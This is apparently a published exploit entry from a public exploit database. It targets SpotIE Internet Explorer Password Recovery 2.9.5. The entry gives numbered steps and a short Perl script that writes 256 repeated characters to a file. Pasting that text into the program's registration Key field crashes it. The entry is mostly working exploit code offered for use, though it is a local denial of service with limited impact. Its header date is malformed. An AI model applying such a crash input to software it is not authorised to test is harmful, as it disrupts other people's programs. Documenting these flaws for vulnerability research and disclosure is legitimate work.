Share
## https://sploitus.com/exploit?id=PACKETSTORM:154596
# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service  
# Date: 2019-20-09  
# Exploit Author: Emilio Revelo  
# Vendor Homepage: http://www.nsauditor.com/  
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe  
# Tested on: Windows 10 Pro x64 es  
# Version: 2.9.5  
  
# Steps to produce the DoS:   
  
# 1.- Run perl script : perl SpotIE.pl  
# 2.- Open SpotIE.txt and copy the content to clipboard  
# 3.- Open SpotIE Internet Explorer Password Recovery  
# 4.- Navigate to Register -> Enter the registration name and key below...  
# 5.- Paste ClipBoard on "Key:"  
# 7.- Ok  
# 8.- Observe the program crash.  
  
#!/usr/local/bin/perl  
  
use strict;  
use warnings;  
  
my $filename = 'SpotIE.txt';  
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";  
print $fh "E"x256;  
close $fh;  
print "Done!\n";  
print "File: SpotIE.txt\n"